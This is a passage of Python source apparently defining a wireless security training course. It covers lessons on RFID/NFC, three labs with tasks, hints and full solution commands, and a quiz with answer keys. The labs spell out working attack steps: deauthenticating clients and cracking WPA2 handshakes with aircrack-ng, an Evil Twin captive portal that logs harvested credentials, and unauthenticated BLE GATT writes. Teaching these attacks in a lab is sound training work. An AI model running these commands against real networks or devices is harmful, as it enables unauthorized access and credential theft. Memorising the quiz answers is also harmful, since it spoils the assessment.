e, firmware extraction. Tools:ubertooth, BLE Scanner, GATTool. Bluetooth sniffing and fuzzing.",
                lesson_type=LessonType.INTERACTIVE, duration_min=55, order=4,
            ),
            SecurityLesson(
                id="wifi_l5", module_id="wireless_001", title="RFID, NFC & Wireless IDS",
                content="RFID frequencies, tag types, cloning with Proxmark3. NFC security: NDEF format, relay attacks, Android HCE. Wireless IDS deployment: WIDS sensors, signature-based detection, anomaly detection. Spectrum analysis and interference detection. IoT wireless protocol security (Zigbee, Z-Wave, LoRaWAN).",
                lesson_type=LessonType.VIDEO, duration_min=45, order=5,
            ),
        ],
        labs=[
            SecurityLab(
                id="wifi_lab1", module_id="wireless_001",
                title="WPA2 Handshake Capture and Crack",
                description="Capture a WPA2 4-way handshake and perform offline dictionary attack.",
                environment="Kali Linux, Alfa AWUS036ACH wireless adapter (monitor mode), test AP, aircrack-ng suite, wordlist.",
                tasks=[
                    "Enable monitor mode on wireless interface",
                    "Use airodump-ng to discover target AP and channel",
                    "Capture WPA2 handshake (or deauth to force reconnection)",
                    "Verify handshake capture with aircrack-ng",
                    "Run dictionary attack against captured handshake",
                    "Document the complete attack chain",
                ],
                hints=[
                    "airmon-ng start wlan0 to enable monitor mode",
                    "aireplay-ng -0 5 -a [BSSID] -c [CLIENT] wlan0mon for deauth",
                    "aircrack-ng -w wordlist.txt -b [BSSID] capture.cap",
                ],
                solution="airmon-ng start wlan0; airodump-ng wlan0mon --bssid TARGET_BSSID -c 6 -w capture; # In new terminal: aireplay-ng -0 5 -a TARGET_BSSID -c CLIENT_MAC wlan0mon; # Wait for WPA handshake; aircrack-ng -w /usr/share/wordlists/rockyou.txt -b TARGET_BSSID capture-01.cap",
                duration_min=60, points=125,
            ),
            SecurityLab(
                id="wifi_lab2", module_id="wireless_001",
                title="Evil Twin Captive Portal Attack",
                description="Create an Evil Twin access point with captive portal for credential harvesting.",
                environment="Kali Linux, hostapd, dnsmasq, Apache, PHP, wireless adapter with AP mode.",
                tasks=[
                    "Configure hostapd with target network SSID",
                    "Set up dnsmasq for DHCP and DNS redirection",
                    "Clone target's captive portal login page",
                    "Redirect all HTTP traffic to captive portal",
                    "Capture submitted credentials",
                    "Implement detection and prevention measures",
                ],
                hints=[
                    "hostapd.conf: interface=wlan0, ssid=TargetNetwork, wpa=2",
                    "dnsmasq redirects all DNS to captive portal IP",
                    "iptables redirects port 80 to local Apache",
                ],
                solution="Configure hostapd.conf with target SSID; dnsmasq --conf-file=dnsmasq.conf; # Redirect: iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80; # Clone portal and capture POST data; echo \"Credentials: $username / $password\" >> /var/www/creds.txt",
                duration_min=75, points=150,
            ),
            SecurityLab(
                id="wifi_lab3", module_id="wireless_001",
                title="Bluetooth BLE Reconnaissance",
                description="Scan, enumerate, and interact with Bluetooth Low Energy devices.",
                environment="Kali Linux, bluez tools, BLE USB dongle, test BLE device (fitness tracker or beacon).",
                tasks=[
                    "Scan for nearby BLE devices with hcitool and bleah",
                    "Enumerate services and characteristics of target device",
                    "Read and write GATT characteristics",
                    "Sniff BLE traffic withubertooth",
                    "Identify security level of BLE pairing",
                    "Document attack surface and recommendations",
                ],
                hints=[
                    "hcitool lescan for BLE device discovery",
                    "gatttool -b MAC_ADDRESS --interactive for GATT interaction",
                    "ubertooth-btle -f -t MAC_ADDRESS for BLE sniffing",
                ],
                solution="hcitool lescan; gatttool -b AA:BB:CC:DD:EE:FF --interactive; # connect; # primary; # characteristics; # char-read-hnd 0x0002; # char-write-req 0x0012 ABCD; # Discover: Device exposes writable characteristics without authentication",
                duration_min=60, points=125,
            ),
        ],
        quiz=SecurityQuiz(
            id="wifi_q1", module_id="wireless_001", title="Wireless Security Assessment",
            passing_score=70, time_limit_minutes=25,
            questions=[
                QuizQuestion("wiq1", "Why is WEP considered insecure?",
                    ["Short key length only", "RC4 stream cipher vulnerabilities and IV reuse", "Too slow", "Requires special hardware"], 1,
                    "WEP's weak IV implementation allows statistical attacks to recover the key in minutes.", DifficultyLevel.BEGINNER),
                QuizQuestion("wiq2", "What is the WPA2 4-way handshake used for?",
                    ["Encrypt all traffic", "Derive session keys and confirm credentials", "Authenticate to RADIUS", "Channel negotiation"], 1,
                    "The 4-way handshake derives PTK/GTK session keys and confirms both parties know the PSK.", DifficultyLevel.INTERMEDIATE),
                QuizQuestion("wiq3", "What is a PMKID attack?",
                    ["Physical attack on router", "Clientless WPA/WPA2 attack extracting PMKID from AP", "Password guessing online", "Packet injection"], 1,
                    "PMKID attack (by hashcat) extracts PMKID from AP's first EAPOL frame without needing client.", DifficultyLevel.ADVANCED),
                QuizQuestion("wiq4", "What does WPA3 SAE provide that WPA2 does not?",
                    ["Faster speeds", "Forward secrecy and offline dictionary attack resistance", "Better range", "More device compatibility"], 1,
                    "SAE (Simultaneous Authentication of Equals) provides forward secrecy and resists offline attacks.", DifficultyLevel.INTERMEDIATE),
                QuizQuestion("wiq5", "What is an Evil Twin attack?",
                    ["Physical device theft", "Rogue AP impersonating a legitimate network", "Two-factor authentication bypass", "WiFi signal jamming"], 1,
                    "Evil Twin sets up a rogue AP with the same SSID as a legitimate network to trick users.", DifficultyLevel.BEGINNER),
                QuizQuestion("wiq6", "What tool is used to enable monitor mode on wireless interfaces?",
                    ["Wireshark", "airmon-ng", "Nmap", "Metasploit"], 1,
                    "airmon-ng is part of aircrack-ng and enables monitor mode on supported wireless cards.", DifficultyLevel.BEGINNER),
                QuizQuestion("wiq7", "What is BLE 'Just Works' pairing vulnerable to?",
                    ["Man-in-the-middle attacks due to no authentication", "Brute force only", "Physical damage", "None - it is secure"], 0,
                    "Just Works pairing provides no authentication, making it vulnerable to MITM attacks.", DifficultyLevel.INTERMEDIATE),
                QuizQuestion("wiq8", "What is the purpose of a wireless IDS?",
                    ["Block all wireless traffic", "Detect rogue APs and wireless attacks", "Speed up WiFi", "Encrypt wireless traffic"], 1,
                    "WIDS detects unauthorized access points, evil twins, and wireless a